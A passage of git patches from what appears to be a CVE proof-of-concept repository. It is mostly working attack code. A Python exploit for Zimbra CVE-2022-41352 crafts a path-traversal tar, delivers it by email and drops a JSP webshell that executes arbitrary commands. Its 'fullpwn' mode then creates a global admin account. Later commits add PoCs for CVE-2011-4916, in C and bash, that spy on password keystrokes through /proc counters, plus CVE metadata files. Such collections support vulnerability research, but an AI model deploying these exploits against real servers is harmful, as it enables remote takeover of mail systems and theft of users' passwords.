+#---------------------------------- +TARGET = 'mail.test.org' +WEBSHELL_PATH = '/public/jsp' +WEBSHELL_NAME = 'Startup1_3.jsp' +ATTACHMENT = 'payload.tar' +SENDER = 'test@test.org' +RECIPIENT = 'admin@test.org' + +EMAIL_SUBJECT = 'CVE-2022-41352' +EMAIL_BODY = 'Just testing.

Don\'t mind me.

' +#---------------------------------- + +# Only change this if zimbra was not installed in the default location +UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' + + +def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): + # Block 1 + link = lnk.encode() + mode = b'0000777\x00' # link permissions + ouid = b'0001745\x00' # octal uid (997) + ogid = b'0001745\x00' # octal gid + lnsz = b'00000000000\x00' # file size (link = 0) + lmod = b'14227770134\x00' # last modified (octal unix) + csum = b' ' # checksum = 8 blanks + type = b'2' # type (link = 2) + targ = payload_path.encode() # link target + magi = b'ustar \x00' # ustar magic bytes + version + ownu = b'zimbra' # user owner + owng = b'zimbra' # group owner + vers = b'\x00'*8 + b'\x00'* 8 # device major and minor + pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) + + raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod + raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] + raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 + # pad block to 512 + raw_b1 += b'\00'*(512-len(raw_b1)) + + # Block 2 + mode = b'0000644\x00' # file permissions + file = f'{lnk}/{payload_name}'.encode() + flsz = oct(len(payload))[2:] # file size + csum = b' ' # checksum = 8 blanks + type = b'0' # type (file = 0) + targ = b'\x00'*100 # link target = none + + raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod + raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] + raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 + # pad block to 512 + raw_b2 += b'\00'*(512-len(raw_b2)) + + + # Assemble + raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) + raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks + + return raw_tar + +# Update this if you want to use a legit email account for sending the payload +def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): + msg = MIMEMultipart() + msg['Subject'] = subject + msg['From'] = sender + msg['To'] = recipient + + message = MIMEText(body, 'html') + msg.attach(message) + + att = MIMEApplication(attachment) + att.add_header('Content-Disposition', 'attachment', filename=attachment_name) + msg.attach(att) + + try: + print(f'>>> Sending payload') + smtp_server = smtplib.SMTP(target,25) + smtp_server.sendmail(sender, recipient, msg.as_string()) + print(f'>>> Payload delivered') + except Exception as e: + print(f'[!] Failed to send the mail: {e}') + sys.exit(1) + +def verify_upload(target, shell, path): + print(f'>>> Verifying upload to {path}/{shell} ...') + sleep(5) # give the server time to process the email + resp = requests.get(f'https://{target}{path}/{shell}', verify=False) + if resp.status_code == 200: + print(f'>>> [PWNED] Upload successful!') + else: + print(f'>>> Upload unsuccesful :(') + sys.exit(1) + +def create_new_zimbra_admin(target, shell, path): + url = f'https://{target}' + pw = 'Pwn1ng_Z1mbra_!s_fun' + print(f'>>> Adding a new global administrator') + if (input(f'>>> Are you sure you want to continue? (yN): ') != 'y'): + sys.exit(0) + admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) + + print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') + print(f'>>> Email : {admin}') + print(f'>>> Password : {pw}') + + +def main(args): + global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY + + # Kali JSP WebShell + payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' + + # Using this instead of argparse default values to allow easy manual configuration as well + if args.payload: + try: + with open(args.payload, 'rb') as f: + payload = f.read() + except Exception as e: + print(f'Failed to read {args.payload}: {e}') + sys.exit(1) + print(f'>>> Using custom payload from: {args.payload}') + else: + print(f'>>> Using default payload: JSP Webshell') + if args.path: + WEBSHELL_PATH = args.path + if args.file: + WEBSHELL_NAME = args.file + if args.attach: + ATTACHMENT = args.attach + + tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) + + print(f'>>> Assembled payload attachment: {ATTACHMENT}') + print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'manual': + with open(ATTACHMENT, 'wb') as f: + f.write(tar) + print(f'>>> Attachment saved locally.') + sys.exit(0) + + if args.target: + TARGET = args.target + + print(f'>>> Targeting {TARGET}') + + if args.sender: + SENDER = args.sender + if args.recip: + RECIPIENT = args.recip + if args.subject: + EMAIL_SUBJECT = args.subject + if args.body: + try: + with open(args.body, 'rb') as f: + EMAIL_BODY = f.read().decode() + except Exception as e: + print(f'Failed to read {args.body}: {e}') + sys.exit(1) + print(f'>>> Using custom email body from: {args.body}') + + + smtp_send_file( TARGET, + SENDER, + RECIPIENT, + EMAIL_SUBJECT, + EMAIL_BODY, + tar, + ATTACHMENT ) + + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'auto': + sys.exit(0) + + if args.payload: + print(f'>>> (!) "fullpwn" depends on the default JSP webshell - won\'t create the admin account') + else: + create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + sys.exit(0) + +if __name__ == '__main__': + epi = ''' +Alternatively, edit the script to change the default configuration. + +The available modes are: + + manual : Only create the payload - you have to deploy the payload yourself. + auto : Create a webshell and deploy it via SMTP. + fullpwn : After deploying a webshell, add a new global mail administrator. +''' + + p = argparse.ArgumentParser( + description = 'CVE-2022-41352 Zimbra RCE', + formatter_class = argparse.RawDescriptionHelpFormatter, + epilog = epi + ) + p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') + + p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') + p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') + p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') + p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') + p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') + p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') + p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') + p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') + p.add_argument('--body', required=False, metavar='', help=f'file containing the html content for the email body (default: "{EMAIL_BODY}")') + + args = p.parse_args() + + main(args) From c61a725ce762184f8bfef88ea2491797fdf7f2da Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 07:48:56 +0000 Subject: [PATCH 086/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/Zimbra/2022/CVE-2022-41352/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Zimbra/2022/CVE-2022-41352/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/.keep diff --git a/cve/Zimbra/2022/CVE-2022-41352/.keep b/cve/Zimbra/2022/CVE-2022-41352/.keep deleted file mode 100644 index e69de29b..00000000 From f355b6b67941c54595d6049c7640dce8e6d17258 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 08:04:13 +0000 Subject: [PATCH 087/109] add cve-2022-41352 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 高方远 --- cve/Zimbra/2022/yaml/CVE-2022-41352.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cve/Zimbra/2022/yaml/CVE-2022-41352.yaml diff --git a/cve/Zimbra/2022/yaml/CVE-2022-41352.yaml b/cve/Zimbra/2022/yaml/CVE-2022-41352.yaml new file mode 100644 index 00000000..1a051231 --- /dev/null +++ b/cve/Zimbra/2022/yaml/CVE-2022-41352.yaml @@ -0,0 +1,24 @@ +id: CVE-2022-41352 +source: https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce +info: + name: Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。 + severity: critical + description: | + An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio. + scope-of-influence: + ZCS < 8.8.15 patch 33 + ZCS < 9.0.0 patch 26 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-41352 + - https://wiki.zimbra.com/wiki/Security_Center + - https://forums.zimbra.org/viewtopic.php?t=71153&p=306532 + - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + - http://packetstormsecurity.com/files/169458/Zimbra-Collaboration-Suite-TAR-Path-Traversal.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-41352 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: CVE-2022, 文件上传 \ No newline at end of file From f98fb3d37439906fa617454ceba4a33ea77a28a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AB=98=E6=96=B9=E8=BF=9C?= Date: Tue, 11 Apr 2023 08:11:53 +0000 Subject: [PATCH 088/109] update other_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 高方远 --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index cf82c0bd..b5ad0832 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -59,5 +59,7 @@ cve: - CVE-2022-30525 WordPress: - CVE-2019-8942 + Zimbra: + - CVE-2022-41352 cnvd: From 277b0312b7aa9be3ebf02a8eb66f20c316ab4741 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:52:28 +0000 Subject: [PATCH 089/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4916?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep new file mode 100644 index 00000000..e69de29b From 341f31d7307540513e647b9597f31e227466b959 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:53:08 +0000 Subject: [PATCH 090/109] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-49?= =?UTF-8?q?16/CVE-2011-4916.c.=20=E6=8F=90=E4=BA=A4POC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 178 ++++++++++++++++++ 1 file changed, 178 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c new file mode 100644 index 00000000..949781c2 --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -0,0 +1,178 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +int i8042_number; +int ints[1024], ints_prev[1024], ints_delta[1024]; + +char buffer[1024]; + +int reread_ints(int *interrupts, int int_count, char **names) +{ + int i; + int n, c1, c2; + char s1[1024], s2[1024]; + + int interrupts_fd; + FILE *interrupts_file; + + interrupts_fd = open("/proc/interrupts", O_RDONLY); + if (interrupts_fd == -1) + err(1, "open(\"/proc/interrupts\")"); + + interrupts_file = fdopen(interrupts_fd, "r"); + if (interrupts_file == NULL) + err(1, "fdopen"); + + if (fseek(interrupts_file, 0, SEEK_SET) < 0) + err(1, "lseek"); + + fgets(buffer, sizeof(buffer), interrupts_file); + + for (i = 0; i < int_count; i++) { + if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { + fclose(interrupts_file); + return i; + } + + if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { + fclose(interrupts_file); + return i; + } + + if (names != NULL && names[i] == NULL) + names[i] = strdup(s2); + + interrupts[i] = c1 + c2; + } + + fclose(interrupts_file); + return int_count; +} + +void init_i8042_number(void) +{ + int i; + int can_be_keyboard[1024]; + char *names[1024]; + int number_of_interrups, can_be_keyboard_numbers; + + number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); + + /* + * Identify the i8042 interrupt associated with the keyboard by: + * 1) name should be i8042 + * 2) interrupts count emitted in one second shouldn't be more than 100 + */ + for (i = 0; i < number_of_interrups; i++) + can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; + + while (1) { + sleep(1); + reread_ints(ints, sizeof(ints), NULL); + + can_be_keyboard_numbers = 0; + for (i = 0; i < number_of_interrups; i++) { + can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; + if (can_be_keyboard[i]) + can_be_keyboard_numbers++; + + ints_prev[i] = ints[i]; + } + + if (can_be_keyboard_numbers == 1) { + for (i = 0; i < number_of_interrups; i++) + if (can_be_keyboard[i]) { + i8042_number = i; + printf("i8042 keyboard is #%d\n", i); + return; + } + } + } +} + +int i8042_read(void) +{ + reread_ints(ints, sizeof(ints), NULL); + ints_prev[i8042_number] = ints[i8042_number]; + + return ints[i8042_number]; +} + +int wait_for_program(char *pname) +{ + FILE *f; + int pid; + char s[1024]; + + snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" + " sleep 0.1; done", pname); + system(s); + snprintf(s, sizeof(s), "pgrep %s", pname); + f = popen(s, "r"); + if (f == NULL) + err(1, "popen"); + + if (fgets(buffer, sizeof(buffer), f) == NULL) + err(1, "fgets"); + + if (sscanf(buffer, "%d", &pid) < 1) + err(1, "sscanf"); + + pclose(f); + + return pid; +} + +int main(int argc, char *argv[]) +{ + int n, old, sum, i; + int pid; + char *pname = argv[1]; + + if (argc < 2) + errx(1, "usage: spy-interrupts gksu"); + + puts("Waiting for mouse activity..."); + init_i8042_number(); + + pid = wait_for_program(pname); + printf("%s is %d\n", pname, pid); + + old = i8042_read(); + + sum = 0; + + while (1) { + n = i8042_read(); + if (old == n) + usleep(10000); + else { + for (i = 0; i < n-old; i++) + putchar('.'); + fflush(stdout); + } + + sum += n - old; + old = n; + + if (kill(pid, 0) < 0 && errno == ESRCH) + break; + } + + /* + * #interrupts == 2 * #keystrokes. + * #keystrokes = len(password) - 1 because of ENTER after the password. + */ + printf("\n%d keystrokes\n", (sum-2)/2); + + return 0; +} \ No newline at end of file From 402b0c217ca604eb0c8317ed5cff6541d99c6fbe Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:53:20 +0000 Subject: [PATCH 091/109] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20?= =?UTF-8?q?cve/linux-kernel/2011/CVE-2011-4916/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2011/CVE-2011-4916/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2011/CVE-2011-4916/.keep diff --git a/cve/linux-kernel/2011/CVE-2011-4916/.keep b/cve/linux-kernel/2011/CVE-2011-4916/.keep deleted file mode 100644 index e69de29b..00000000 From 8d94d224f4a3ee80dabad5c5206e244fc86d443f Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 11:58:01 +0000 Subject: [PATCH 092/109] =?UTF-8?q?update=20cve/linux-kernel/2011/CVE-2011?= =?UTF-8?q?-4916/CVE-2011-4916.c.=20=E4=BF=AE=E6=94=B9PoC?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 206 +++--------------- 1 file changed, 32 insertions(+), 174 deletions(-) diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c index 949781c2..addc78ce 100644 --- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -1,178 +1,36 @@ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include +PNAME="$1" +while :; do + PID=`pgrep "$PNAME"` + if [ -n "$PID" ]; then + echo $PID + cd /proc/$PID/ + break + fi + sleep 1 +done -int i8042_number; -int ints[1024], ints_prev[1024], ints_delta[1024]; +S=0.0 +while :; do + V=`grep se.exec_start sched 2>/dev/null | cut -d: -f2-` + [ -z "$V" ] && break + if [ "$V" != "$S" ]; then + VAL=`echo "$V - $S" | bc -l` + VALI=`echo $VAL | cut -d. -f1` + [ -z "$VALI" ] && VALI=0 -char buffer[1024]; + if [ "$VALI" -le 815 -a "$VALI" -ge 785 ]; then + # Cursor appeared + : + elif [ $VALI -le 415 -a $VALI -ge 385 ]; then + # Cursor disappeared + : + elif [ $VALI -ge 150 ]; then + echo "$VAL (KEY PRESSED)" + else + echo "$VAL" + fi -int reread_ints(int *interrupts, int int_count, char **names) -{ - int i; - int n, c1, c2; - char s1[1024], s2[1024]; - - int interrupts_fd; - FILE *interrupts_file; - - interrupts_fd = open("/proc/interrupts", O_RDONLY); - if (interrupts_fd == -1) - err(1, "open(\"/proc/interrupts\")"); - - interrupts_file = fdopen(interrupts_fd, "r"); - if (interrupts_file == NULL) - err(1, "fdopen"); - - if (fseek(interrupts_file, 0, SEEK_SET) < 0) - err(1, "lseek"); - - fgets(buffer, sizeof(buffer), interrupts_file); - - for (i = 0; i < int_count; i++) { - if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { - fclose(interrupts_file); - return i; - } - - if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { - fclose(interrupts_file); - return i; - } - - if (names != NULL && names[i] == NULL) - names[i] = strdup(s2); - - interrupts[i] = c1 + c2; - } - - fclose(interrupts_file); - return int_count; -} - -void init_i8042_number(void) -{ - int i; - int can_be_keyboard[1024]; - char *names[1024]; - int number_of_interrups, can_be_keyboard_numbers; - - number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); - - /* - * Identify the i8042 interrupt associated with the keyboard by: - * 1) name should be i8042 - * 2) interrupts count emitted in one second shouldn't be more than 100 - */ - for (i = 0; i < number_of_interrups; i++) - can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; - - while (1) { - sleep(1); - reread_ints(ints, sizeof(ints), NULL); - - can_be_keyboard_numbers = 0; - for (i = 0; i < number_of_interrups; i++) { - can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; - if (can_be_keyboard[i]) - can_be_keyboard_numbers++; - - ints_prev[i] = ints[i]; - } - - if (can_be_keyboard_numbers == 1) { - for (i = 0; i < number_of_interrups; i++) - if (can_be_keyboard[i]) { - i8042_number = i; - printf("i8042 keyboard is #%d\n", i); - return; - } - } - } -} - -int i8042_read(void) -{ - reread_ints(ints, sizeof(ints), NULL); - ints_prev[i8042_number] = ints[i8042_number]; - - return ints[i8042_number]; -} - -int wait_for_program(char *pname) -{ - FILE *f; - int pid; - char s[1024]; - - snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" - " sleep 0.1; done", pname); - system(s); - snprintf(s, sizeof(s), "pgrep %s", pname); - f = popen(s, "r"); - if (f == NULL) - err(1, "popen"); - - if (fgets(buffer, sizeof(buffer), f) == NULL) - err(1, "fgets"); - - if (sscanf(buffer, "%d", &pid) < 1) - err(1, "sscanf"); - - pclose(f); - - return pid; -} - -int main(int argc, char *argv[]) -{ - int n, old, sum, i; - int pid; - char *pname = argv[1]; - - if (argc < 2) - errx(1, "usage: spy-interrupts gksu"); - - puts("Waiting for mouse activity..."); - init_i8042_number(); - - pid = wait_for_program(pname); - printf("%s is %d\n", pname, pid); - - old = i8042_read(); - - sum = 0; - - while (1) { - n = i8042_read(); - if (old == n) - usleep(10000); - else { - for (i = 0; i < n-old; i++) - putchar('.'); - fflush(stdout); - } - - sum += n - old; - old = n; - - if (kill(pid, 0) < 0 && errno == ESRCH) - break; - } - - /* - * #interrupts == 2 * #keystrokes. - * #keystrokes = len(password) - 1 because of ENTER after the password. - */ - printf("\n%d keystrokes\n", (sum-2)/2); - - return 0; -} \ No newline at end of file + S=$V + fi +done \ No newline at end of file From 3621620045a525a8881287fa54a581a4f1c6a61e Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:00:48 +0000 Subject: [PATCH 093/109] =?UTF-8?q?add=20cve/linux-kernel/2011/CVE-2011-49?= =?UTF-8?q?16/README.md.=20=E6=B7=BB=E5=8A=A0README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: gzm --- cve/linux-kernel/2011/CVE-2011-4916/README.md | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 cve/linux-kernel/2011/CVE-2011-4916/README.md diff --git a/cve/linux-kernel/2011/CVE-2011-4916/README.md b/cve/linux-kernel/2011/CVE-2011-4916/README.md new file mode 100644 index 00000000..6ca03d6e --- /dev/null +++ b/cve/linux-kernel/2011/CVE-2011-4916/README.md @@ -0,0 +1,14 @@ +A PoC for spying for keystrokes in gksu in Linux <= 3.1. + +/proc/$PID/{sched,schedstat} are world readable, so we can just loop +on one CPU core while the victim is executed on another, and spy for +the changes of scheduling counters. The PoC counts only keystrokes number, +but it can be easily extended to note the delays between the keystrokes +and do the statistical analysis to learn the input characters. See +e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. + +It is NOT stable, it only shows a design flaw (the lack of proper +permission model of procfs debugging counters). The constants are true +for the author's system only and don't take into account other sources of +gksu CPU activity. \ No newline at end of file From c15f3bab81a4a98c7f3cb9b1eaba35ff63142d1d Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:02:42 +0000 Subject: [PATCH 094/109] update cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c. Signed-off-by: gzm --- .../2011/CVE-2011-4916/CVE-2011-4916.c | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c index addc78ce..df2656d1 100644 --- a/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c +++ b/cve/linux-kernel/2011/CVE-2011-4916/CVE-2011-4916.c @@ -1,3 +1,24 @@ +#!/bin/bash +# +# A PoC for spying for keystrokes in gksu in Linux <= 3.1. +# +# /proc/$PID/{sched,schedstat} are world readable, so we can just loop +# on one CPU core while the victim is executed on another, and spy for +# the changes of scheduling counters. The PoC counts only keystrokes number, +# but it can be easily extended to note the delays between the keystrokes +# and do the statistical analysis to learn the input characters. See +# e.g. "Peeping Tom in the Neighborhood: Keystroke Eavesdropping on +# Multi-User Systems" by Kehuan Zhang and XiaoFeng Wang. +# +# It is NOT stable, it only shows a design flaw (the lack of proper +# permission model of procfs debugging counters). The constants are true +# for the author's system only and don't take into account other sources of +# gksu CPU activity. +# +# by segoon from openwall +# +# run as: spy-sched gksu + PNAME="$1" while :; do From bbc50d66efc92dab43284de671465a40e5c5427e Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:06:11 +0000 Subject: [PATCH 095/109] add cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml. Signed-off-by: gzm --- cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml new file mode 100644 index 00000000..2442cf53 --- /dev/null +++ b/cve/linux-kernel/2011/yaml/CVE-2011-4916.yaml @@ -0,0 +1,18 @@ +id: CVE-2011-4916 +source: https://www.openwall.com/lists/oss-security/2011/11/05/3 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: medium + description: Linux内核3.1版允许本地用户通过访问/dev/pts/和/dev/tty*来获取敏感的击键信息。 + scope-of-influence: + Linux kernel <= 3.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4916 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.5 + cve-id: CVE-2011-4916 + cwe-id: CWE-200 + cnvd-id: None + kve-id: None + tags: information disclosure \ No newline at end of file From 278eb1bf5821b17e0ac39ae8b18aa62e7e326206 Mon Sep 17 00:00:00 2001 From: gzm Date: Tue, 11 Apr 2023 12:07:29 +0000 Subject: [PATCH 096/109] update other_list.yaml. Signed-off-by: gzm --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index b5ad0832..8e7bacf1 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -15,6 +15,7 @@ cve: - CVE-2023-0179 - CVE-2018-18955 - CVE-2011-4917 + - CVE-2011-4916 polkit: - CVE-2021-3560 Outlook: From 7c80dc0349cc10bda5e63fef116cca5524d649e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:53:44 +0000 Subject: [PATCH 097/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202017?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/.keep diff --git a/cve/java-spring/2017/.keep b/cve/java-spring/2017/.keep new file mode 100644 index 00000000..e69de29b From 4b6f0f8165d95fa97545a16cc00b8f20cc604b67 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:54:28 +0000 Subject: [PATCH 098/109] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2017-8046?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring/2017/CVE-2017-8046/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring/2017/CVE-2017-8046/.keep diff --git a/cve/java-spring/2017/CVE-2017-8046/.keep b/cve/java-spring/2017/CVE-2017-8046/.keep new file mode 100644 index 00000000..e69de29b From 0e1a29412964d1db7fd4310a2c2864d53a5e4849 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 10 Apr 2023 10:56:14 +0000 Subject: [PATCH 099/109] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- .../spring-break_cve-2017-8046-master.zip | Bin 0 -> 12833 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 